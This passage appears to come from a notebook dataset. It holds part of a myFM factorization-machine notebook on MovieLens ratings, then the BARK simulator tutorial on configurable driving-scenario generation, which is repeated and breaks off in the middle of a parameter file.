fm_probit = myfm.MyFMOrderedProbit(rank=10)
fm_probit.fit(
X_date_train, df_train.rating.values - 1, X_rel=train_blocks,
group_shapes=group_shapes,
n_iter=512, n_kept_samples=512
);
test_prediction_ordered_prob = fm_probit.predict_proba(X_date_test, test_blocks)
test_prediction_ordered_mean = 1 + test_prediction_ordered_prob.dot(np.arange(5)) # class 0 => rating 1 shift
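# (Added note) The line above is the posterior mean rating:
# E[rating] = sum_k (k + 1) * P(class = k), since classes 0..4 correspond to
# ratings 1..5 and the probabilities sum to one, which gives the "+ 1" shift.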
rmse = (
(test_prediction_ordered_mean - df_test.rating.values) **2
).mean() ** 0.5
mae = np.abs(test_prediction_ordered_mean - df_test.rating).mean()
test_predictions = fm.predict(X_date_test, test_blocks)
print('rmse={}, mae={}'.format(rmse, mae))
# If we use the original data format, it takes much more!
X_original_format = []
if use_date:
X_original_format.append(X_date_train)
X_original_format.extend(
[rel.data[rel.original_to_block] for rel in train_blocks]
)
X_original_format = sps.hstack(X_original_format, format='csr')
fm_rawformat = myfm.MyFMRegressor(rank=10).fit(
X_original_format, df_train.rating,
group_shapes=group_shapes, n_iter=6, n_kept_samples=1
)
# They should be the same up to floating point artifacts.
fm_rawformat.predictor_.samples[-1].V - fm.predictor_.samples[5].V
###Output
_____no_output_____
###Markdown
User Relation Block to express data. See [\[Rendle 2013\]](http://www.vldb.org/pvldb/vol6/p337-rendle.pdf) for how the complexity decreases drastically in this case (and in most cases with a bipartite graph structure).
###Code
# Create RelationBlock.
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.unique.html
train_blocks = []
test_blocks = []
for source, target in [(df_train, train_blocks), (df_test, test_blocks)]:
unique_users, user_map = np.unique(source.user_id, return_inverse=True)
target.append(
RelationBlock(user_map, augment_user_id(unique_users))
)
unique_movies, movie_map = np.unique(source.movie_id, return_inverse=True)
target.append(
RelationBlock(movie_map, augment_movie_id(unique_movies))
)
if use_date:
X_date_train = date_encoder.to_sparse(df_train.timestamp.dt.date.values)
X_date_test = date_encoder.to_sparse(df_test.timestamp.dt.date.values)
else:
X_date_train = None
X_date_test = None
###Output
/home/tomoki/myFM/myfm/utils/encoders/binning.py:33: RuntimeWarning: invalid value encountered in greater_equal
cols[non_na_index] += x_not_na >= p
###Markdown
Regression
###Code
group_shapes = ([len(date_encoder)] if use_date else []) + user_encoder.encoder_shapes + movie_encoder.encoder_shapes
fm = myfm.MyFMRegressor(rank=10)
fm.fit(
X_date_train, df_train.rating.values, X_rel=train_blocks,
group_shapes=group_shapes,
X_test=X_date_test, X_rel_test=test_blocks,
y_test=df_test.rating.values,
n_iter=512, n_kept_samples=512
);
test_predictions = fm.predict(X_date_test, test_blocks)
rmse = (
(test_predictions - df_test.rating.values)**2
).mean() ** 0.5
mae = np.abs(test_predictions - df_test.rating).mean()
# Note the improvement from "id_only" case.
# Compare this with methods like ones in https://paperswithcode.com/sota/collaborative-filtering-on-movielens-100k
print('rmse={}, mae={}'.format(rmse, mae))
###Output
rmse=0.8832517431687069, mae=0.6943815452471757
###Markdown
Ordered Probit Regression
###Code
fm_probit = myfm.MyFMOrderedProbit(rank=10)
fm_probit.fit(
X_date_train, df_train.rating.values - 1, X_rel=train_blocks,
group_shapes=group_shapes,
n_iter=512, n_kept_samples=512
);
test_prediction_ordered_prob = fm_probit.predict_proba(X_date_test, test_blocks)
test_prediction_ordered_mean = 1 + test_prediction_ordered_prob.dot(np.arange(5)) # class 0 => rating 1 shift
rmse = (
(test_prediction_ordered_mean - df_test.rating.values) **2
).mean() ** 0.5
mae = np.abs(test_prediction_ordered_mean - df_test.rating).mean()
test_predictions = fm.predict(X_date_test, test_blocks)
print('rmse={}, mae={}'.format(rmse, mae))
# If we use the original data format, it takes much more!
X_original_format = []
if use_date:
X_original_format.append(X_date_train)
X_original_format.extend(
[rel.data[rel.original_to_block] for rel in train_blocks]
)
X_original_format = sps.hstack(X_original_format, format='csr')
fm_rawformat = myfm.MyFMRegressor(rank=10).fit(
X_original_format, df_train.rating,
group_shapes=group_shapes, n_iter=6, n_kept_samples=1
)
# They should be the same up to floating point artifacts.
fm_rawformat.predictor_.samples[-1].V - fm.predictor_.samples[5].V
###Output
_____no_output_____ |
docs/tutorials/03_configurable_scenario_generation.ipynb | ###Markdown
3. Configurable Scenario Generation. In this notebook, we demonstrate the capabilities of the configurable scenario generation of BARK. First, we clarify what a BARK scenario is, and then describe how the configurable scenario generation allows flexible, extensible creation of a variety of scenario types. 3.1 BARK Scenarios. A BARK scenario contains a list of agents with their initial states, behavior, execution and dynamic models as well as a goal definition for each agent. Further, it contains a map file in the OpenDrive format. To support behavior benchmarking, each scenario specifies which agent is considered the ‘controlled’ agent during the simulation. A BARK scenario does not explicitly specify how agents will behave over time, e.g. using predefined maneuvers or trajectories. A BARK scenario thus uses the following implementation:
###Code
class Scenario:
def __init__(self,
agent_list=None,
eval_agent_ids=None,
map_file_name=None,
json_params=None,
map_interface=None):
self._agent_list = agent_list or []
self._eval_agent_ids = eval_agent_ids or []
self._map_file_name = map_file_name
self._json_params = json_params
self._map_interface = map_interface
###Output
_____no_output_____
###Markdown
The scenario class persists agents and the map file name separately. When multiple scenarios are based on the same map file, this avoids serializing the processed map information in every scenario. In contrast, agents are fully serialized via python pickling. For this, the C++ agent class and all its members, e.g. behavior models, support python serialization. Before a scenario is run, the benchmark runner calls `_build_world_state` to create the world state used in a simulation run:
###Code
def _build_world_state(self):
param_server = ParameterServer(json=self._json_params)
world = World(param_server)
if self._map_interface is None:
world = self.SetupMap(world, self._map_file_name)
else:
world.SetMap(self._map_interface)
for agent in self._agent_list:
agent.GenerateRoadCorridor(self._map_interface)
world.AddAgent(agent)
return world
###Output
_____no_output_____
###Markdown
3.2 BARK Scenario Generation. Based on the scenario definition, we define a Scenario Generation base class that is responsible for creating a list of scenarios and for saving, loading and retrieving scenario sets. The simplified structure of BARK's base scenario generation is:
###Code
class ScenarioGeneration:
def __init__(self, params=None, num_scenarios=None, random_seed=1000):
self._params = params
self._current_scenario_idx = 0
self._random_seed = random_seed
self._scenario_list = self.create_scenarios(params, num_scenarios)
def get_scenario(self, idx):
return self._scenario_list[idx].copy()
def dump_scenario_list(self, filename):
with open(filename, "wb") as file:
# print("SAVE PATH:", os.path.abspath(filename))
pickle.dump(self._scenario_list, file)
def load_scenario_list(self, filename):
with open(filename, "rb") as file:
self._scenario_list = pickle.load(file)
###Output
_____no_output_____
###Markdown
This base class allows new scenario generations to be created easily while enabling easy integration into BARK's benchmarking and ML training platforms, which use these common interfaces. Let's have a look at what the configurable scenario generation provides. 3.3 Concept of Configurable Scenario Generation. Although new scenario generations are supported via the common interface, we require a modularized perspective on the set of features characterizing a scenario. For instance, we want to configure initial states of agents independently of behavior models or goal configurations. To achieve this, we must ensure that configuration options for one set of features can easily be combined with other sets of features. The configurable scenario generation implements this requirement. The fundamental building blocks of a scenario in the configurable scenario generation are source sink pairs. A source sink pair defines a road corridor in the map. It is specified with either a pair of OpenDrive Road Ids or a pair of X/Y Points. For each source sink pair, multiple config readers are responsible for creating the features within this source sink pair. Config readers exist for each relevant property of a scenario and are processed for a source sink pair in a specific order. Information from one config reader is passed on to the next readers. We distinguish between fundamental information to build a scenario, which must be returned by a config reader, and optional information, which may be passed and could be incorporated by subsequent readers. The information flow to create the agents in a **single** source sink config is as follows: 1. ConfigReaderAgentStatesAndGeometries: - Retrieves: Road corridor of this source sink - Must return: list of agent states and a list of agent shapes - Optional return: e.g. list of agent ids, lane positions, 2. ConfigBehaviorModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of behavior models for each agent in agent state list - Optional return: e.g. list of types of behavior models 3. ConfigExecutionModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of execution models for each agent in agent state list - Optional return: e.g. list of types of execution models 4. ConfigDynamicModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of dynamic models for each agent in agent state list - Optional return: e.g. list of types of dynamic models 5. ConfigControlledAgents: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: List of size agent state list with True or False indicating if agent is controlled in a benchmarking run or not - Optional return: normally nothing 6. ConfigGoalDefinitions: - Retrieves: Road corridor of this source sink, agent state list, list of controlled_agent_ids, collected optional returns - Must return: List of goal definitions one for each agent in agent state list - Optional return: normally nothing Returns are collected and finally the agents for the source sink config are created. Then, the chain is run for the next source sink config. 
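To make the chain concrete, here is a minimal, hypothetical sketch (not code taken from BARK) of a ConfigControlledAgents reader that marks no agent as controlled. It assumes an interface class ConfigReaderControlledAgents analogous to the ConfigReaderBehaviorModels interface used later in this tutorial, and follows the return convention of result list, dict of optional returns, and config parameter object.
###Code
# Hypothetical sketch, not part of BARK: a ConfigControlledAgents reader that
# controls no agent. It returns one flag per agent state, an (empty) dict of
# optional returns, and the config parameter object.
class NoneControlledSketch(ConfigReaderControlledAgents):
    def create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs):
        controlled_flags = [False for _ in agent_states]
        return controlled_flags, {}, config_param_object
###Output
_____no_output_____
###Markdown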
The interfaces of all config reader types are implemented in [config_readers_interfaces.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/config_readers_interfaces.py). 3.4 Understanding Parameter Files. Let's have a look at the default parameter file of the configurable scenario generation to better understand this concept:
###Code
import config_notebook
import json
from bark.runtime.scenario.scenario_generation.configurable_scenario_generation import ConfigurableScenarioGeneration
from bark.runtime.commons.parameters import ParameterServer
import os
params = ParameterServer()
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
params.Save("default_params.json")
print("\n\n ------ Scenario Default Parameters ---------")
print(json.dumps(params.ConvertToDict(), indent=4))
###Output
Changing to bark root /home/julo/.cache/bazel/_bazel_julo/6148542f54f1c4e49e4ced7294c97977/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project
Writing parameters to /home/julo/.cache/bazel/_bazel_julo/6148542f54f1c4e49e4ced7294c97977/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project/default_params.json
------ Scenario Default Parameters ---------
{
"Scenario": {
"Generation": {
"ConfigurableScenarioGeneration": {
"MapFilename": "bark/runtime/tests/data/city_highway_straight.xodr",
"SinksSources": [
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
0
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 60.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "NoneControlled"
},
"AgentParams": {
"MaxHistoryLength": 50
}
},
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
1
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 30.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "RandomSingleAgent"
},
"AgentParams": {
"MaxHistoryLength": 50
}
}
],
"ConflictResolution": {
"left_lane/right_lane": [
0.2,
0.8
]
}
}
}
}
}
###Markdown
In the default configuration, we have two source sink configs specified: one for the left lane of the road corridor on a highway, one for the right lane. We use the config reader type UniformVehicleDistribution for ConfigAgentStatesGeometries. There, we can specify vehicle distance ranges and ranges of initial velocity. As behavior model config, we use FixedBehaviorType, where one type of behavior model with its parameters is specified. The goal definition uses the config reader FixedGoalTypes, enabling separate specification of goal definitions for controlled and non-controlled agents. It uses a FrenetGoalType with a geometric goal region around the centerline of the goal lane. The range of this region is specified via the parameter LongitudinalRange. With BARK's runtime, we can have a look through the scenarios created with the default parameter config:
###Code
from IPython import display
from bark.runtime.viewer.matplotlib_viewer import MPViewer
from bark.runtime.runtime import Runtime
import matplotlib.pyplot as plt
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
follow_agent_id=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
We see the controlled agent in red and its goal region on the right lane. We now tune the parameters so that the controlled agent's goal is on the left lane. Additionally, we want to create denser traffic on the left lane to make the lane change scenario harder. We decrease the ranges for sampling distances and velocities and recreate the scenarios:
###Code
params_src_sink_right = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]
params_src_sink_right["ConfigGoalDefinitions"]["GoalTypeControlled"] = "LaneChangeLeft"
params_src_sink_left = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][0]
params_src_sink_left["ConfigAgentStatesGeometries"]["VehicleDistanceRange"] = [3, 6]
params_src_sink_left["ConfigAgentStatesGeometries"]["OtherVehicleVelocityRange"] = [3, 6]
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3.5 Conflict Resolution between Source Sink Configs. As discussed, the config reader chain is processed separately for each source sink config. To avoid **physical** overlapping of initial agent states, we can use the conflict resolution specification between source sink configs. Especially in intersection scenarios, overlaps occur within the intersection or when building scenarios where vehicles should either turn left or go straight. In the following, we show an intersection scenario and explain the conflict resolution.
###Code
scenario_param_file ="intersection_configurable.json" # must be within examples params folder
param_server = ParameterServer(filename= os.path.join("examples/params/",scenario_param_file))
scenario_generation = ConfigurableScenarioGeneration(num_scenarios=20, random_seed=0, params=param_server)
viewer = MPViewer(params=param_server, use_world_bounds=True)
sim_step_time = param_server["simulation"]["step_time",
"Step-time used in simulation",
0.2]
sim_real_time_factor = param_server["simulation"]["real_time_factor",
"execution in real-time or faster", 1]
scenario, idx = scenario_generation.get_next_scenario()
num_scenarios_to_show = 20
num_steps_per_scenario = 20
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
For this scenario, we specified three source sink configurations: one for the west->east corridor, one for the south->west corridor and one for the west->south corridor. In the scenario generation param file, we specified how overlaps should be resolved as follows:
###Code
print(json.dumps(param_server["Scenario"]["Generation"] \
["ConfigurableScenarioGeneration"]["ConflictResolution"].ConvertToDict(), indent=4))
###Output
{
"west_south/west_east": [
0.45,
0.55
],
"south_west/west_east": [
0.5,
0.5
],
"south_west/west_south": [
0.5,
0.5
]
}
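###Markdown
Before looking at the entries in detail, here is a rough, purely illustrative sketch (not BARK's internal implementation) of how a single overlap could be resolved according to such a probability entry:
###Code
# Illustrative only: choose which corridor keeps its vehicle when two sampled
# initial states overlap, according to the configured probabilities.
import numpy as np
rng = np.random.RandomState(0)
pair, probs = "west_south/west_east", [0.45, 0.55]
winner = rng.choice(pair.split("/"), p=probs)  # e.g. 'west_east' with probability 0.55
###Output
_____no_output_____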
###Markdown
The names used correspond to the source sink descriptions given in the definitions of the respective source sink configs. The numbers specify with what probability an overlap is resolved using a vehicle from one or the other corridor. We continue with writing our own config reader. 3.6 Writing your own config reader to sample behavior types. There are a number of config readers defined in [config_readers](https://github.com/bark-simulator/bark/tree/master/bark/runtime/scenario/scenario_generation/config_readers) and we plan to extend this set further in the future. In this section, we demonstrate how to write your own config reader, using a config reader for behavior model sampling as an example. The process can easily be applied to the other config reader types as well. The config reader shall randomly sample behavior types from a list of specified behavior types. We implement the interface of ConfigReaderBehaviorModels as follows:
###Code
from bark.runtime.scenario.scenario_generation.config_readers.config_readers_interfaces import ConfigReaderBehaviorModels
from bark.core.models.behavior import *
from bark.runtime.commons.parameters import ParameterServer
class SampleBehaviorType(ConfigReaderBehaviorModels):
def __init__(self, random_state):
super().__init__(random_state)
self.param_servers = []
def create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs):
model_types = config_param_object["ModelTypesList", "Type of behavior model " \
"used for all vehicles", ["BehaviorIDMClassic", "BehaviorMobil"]]
model_params = config_param_object.AddChild("ModelParams")
# ----- DEFAULT PARAMETER HANDLING
# based on types retrieve default params which are maintained as scenario defaults
for model_type in model_types:
behavior_params = model_params.AddChild(model_type)
_, _ = self.model_from_model_type(model_type, behavior_params)
#param server must be persisted for each behavior to enable serialization of parameters
#------ BEHAVIOR MODEL SAMPLING
behavior_models = []
behavior_model_types = []
for _ in agent_states:
model_idx = self.random_state.randint(low=0, high=len(model_types), size=None)
model_type = model_types[model_idx]
model_type_params = model_params.AddChild(model_type)
params = ParameterServer()
bark_model, params = self.model_from_model_type(model_type, model_type_params)
self.param_servers.append(model_type_params)
behavior_models.append(bark_model)
behavior_model_types.append(model_type)
return behavior_models, {"behavior_model_types" : behavior_model_types}, config_param_object
def model_from_model_type(self, model_type, params):
bark_model = eval("{}(params)".format(model_type))
return bark_model, params
def get_param_servers(self):
return self.param_servers
###Output
_____no_output_____
###Markdown
The main functionality is covered in `create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs)`. Here, we first read a list of behavior types from the parameter server and read out the default parameters of these model types. Then, we use the global random seed state managed by the scenario generation to sample the behavior types. Note that the parameter servers of the objects must be persisted to allow for serialization of the behavior models. This class definition must be found by ConfigurableScenarioGeneration. We put it into [behavior_model_config_readers.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/behavior_model_config_readers.py), which contains the already existing ConfigReaderBehaviorModels. Now, we use this config to randomly sample Mobil and IDM models on the right highway lane. We first set the type of ConfigBehaviorModels to our new definition. By rerunning the scenario generation, all **default parameters are automatically extracted**. Afterwards, we can finetune these parameters. First, let's specify the new config type and extract the defaults. To specify a config type, simply use the name given to the config reader class. We now have the following initial source sink config, and running the scenario generation gives us the default params. These can of course be customized as desired.
###Code
sink_source_dict = [{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [0]},
"ConfigBehaviorModels": {"Type": "FixedBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "NoneControlled"},
"AgentParams" : {}
},
{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [1]},
"ConfigBehaviorModels": {"Type": "SampleBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "RandomSingleAgent"},
"AgentParams" : {}
}]
params = ParameterServer()
params["World"]["remove_agents_out_of_map"] = True
params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"] = sink_source_dict
scenario_generation = ConfigurableScenarioGeneration(num_scenarios=2,params=params)
print("\n\n ------ ConfigBehaviorModels Default Parameters ---------")
print(json.dumps(params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]["ConfigBehaviorModels"], indent=4))
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
use_world_bounds=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 20
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3. Configurable Scenario Generation. In this notebook, we demonstrate the capabilities of the configurable scenario generation of BARK. First, we clarify what a BARK scenario is, and then describe how the configurable scenario generation allows flexible, extensible creation of a variety of scenario types. 3.1 BARK Scenarios. A BARK scenario contains a list of agents with their initial states, behavior, execution and dynamic models as well as a goal definition for each agent. Further, it contains a map file in the OpenDrive format. To support behavior benchmarking, each scenario specifies which agent is considered the ‘controlled’ agent during the simulation. A BARK scenario does not explicitly specify how agents will behave over time, e.g. using predefined maneuvers or trajectories. A BARK scenario thus uses the following implementation:
###Code
class Scenario:
def __init__(self,
agent_list=None,
eval_agent_ids=None,
map_file_name=None,
json_params=None,
map_interface=None):
self._agent_list = agent_list or []
self._eval_agent_ids = eval_agent_ids or []
self._map_file_name = map_file_name
self._json_params = json_params
self._map_interface = map_interface
###Output
_____no_output_____
###Markdown
The scenario class persists agents and the map file name separately. When multiple scenarios are based on the same map file, this avoids serializing the processed map information in every scenario. In contrast, agents are fully serialized via python pickling. For this, the C++ agent class and all its members, e.g. behavior models, support python serialization. Before a scenario is run, the benchmark runner calls `_build_world_state` to create the world state used in a simulation run:
###Code
def _build_world_state(self):
param_server = ParameterServer(json=self._json_params)
world = World(param_server)
if self._map_interface is None:
world = self.SetupMap(world, self._map_file_name)
else:
world.SetMap(self._map_interface)
for agent in self._agent_list:
agent.GenerateRoadCorridor(self._map_interface)
world.AddAgent(agent)
return world
###Output
_____no_output_____
###Markdown
3.2 BARK Scenario Generation. Based on the scenario definition, we define a Scenario Generation base class that is responsible for creating a list of scenarios and for saving, loading and retrieving scenario sets. The simplified structure of BARK's base scenario generation is:
###Code
class ScenarioGeneration:
def __init__(self, params=None, num_scenarios=None, random_seed=1000):
self._params = params
self._current_scenario_idx = 0
self._random_seed = random_seed
self._scenario_list = self.create_scenarios(params, num_scenarios)
def get_scenario(self, idx):
return self._scenario_list[idx].copy()
def dump_scenario_list(self, filename):
with open(filename, "wb") as file:
# print("SAVE PATH:", os.path.abspath(filename))
pickle.dump(self._scenario_list, file)
def load_scenario_list(self, filename):
with open(filename, "rb") as file:
self._scenario_list = pickle.load(file)
###Output
_____no_output_____
###Markdown
This base class allows new scenario generations to be created easily while enabling easy integration into BARK's benchmarking and ML training platforms, which use these common interfaces. Let's have a look at what the configurable scenario generation provides. 3.3 Concept of Configurable Scenario Generation. Although new scenario generations are supported via the common interface, we require a modularized perspective on the set of features characterizing a scenario. For instance, we want to configure initial states of agents independently of behavior models or goal configurations. To achieve this, we must ensure that configuration options for one set of features can easily be combined with other sets of features. The configurable scenario generation implements this requirement. The fundamental building blocks of a scenario in the configurable scenario generation are source sink pairs. A source sink pair defines a road corridor in the map. It is specified with either a pair of OpenDrive Road Ids or a pair of X/Y Points. For each source sink pair, multiple config readers are responsible for creating the features within this source sink pair. Config readers exist for each relevant property of a scenario and are processed for a source sink pair in a specific order. Information from one config reader is passed on to the next readers. We distinguish between fundamental information to build a scenario, which must be returned by a config reader, and optional information, which may be passed and could be incorporated by subsequent readers. The information flow to create the agents in a **single** source sink config is as follows: 1. ConfigReaderAgentStatesAndGeometries: - Retrieves: Road corridor of this source sink - Must return: list of agent states and a list of agent shapes - Optional return: e.g. list of agent ids, lane positions, 2. ConfigBehaviorModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of behavior models for each agent in agent state list - Optional return: e.g. list of types of behavior models 3. ConfigExecutionModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of execution models for each agent in agent state list - Optional return: e.g. list of types of execution models 4. ConfigDynamicModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of dynamic models for each agent in agent state list - Optional return: e.g. list of types of dynamic models 5. ConfigControlledAgents: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: List of size agent state list with True or False indicating if agent is controlled in a benchmarking run or not - Optional return: normally nothing 6. ConfigGoalDefinitions: - Retrieves: Road corridor of this source sink, agent state list, list of controlled_agent_ids, collected optional returns - Must return: List of goal definitions one for each agent in agent state list - Optional return: normally nothing Returns are collected and finally the agents for the source sink config are created. Then, the chain is run for the next source sink config. 
The interfaces of all config reader types are implemented in [config_readers_interfaces.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/config_readers_interfaces.py). 3.4 Understanding Parameter Files. Let's have a look at the default parameter file of the configurable scenario generation to better understand this concept:
###Code
import config_notebook
import json
from bark.runtime.scenario.scenario_generation.configurable_scenario_generation import ConfigurableScenarioGeneration
from bark.runtime.commons.parameters import ParameterServer
params = ParameterServer()
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
params.Save("default_params.json")
print("\n\n ------ Scenario Default Parameters ---------")
print(json.dumps(params.ConvertToDict(), indent=4))
###Output
Changing to bark root /home/esterle/.cache/bazel/_bazel_esterle/d337abac8c371120c1b9affa1049fa7e/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project
Writing parameters to /home/esterle/.cache/bazel/_bazel_esterle/d337abac8c371120c1b9affa1049fa7e/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project/default_params.json
------ Scenario Default Parameters ---------
{
"Scenario": {
"Generation": {
"ConfigurableScenarioGeneration": {
"MapFilename": "bark/runtime/tests/data/city_highway_straight.xodr",
"SinksSources": [
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
0
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 60.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "NoneControlled"
},
"AgentParams": {
"MaxHistoryLength": 50
}
},
{
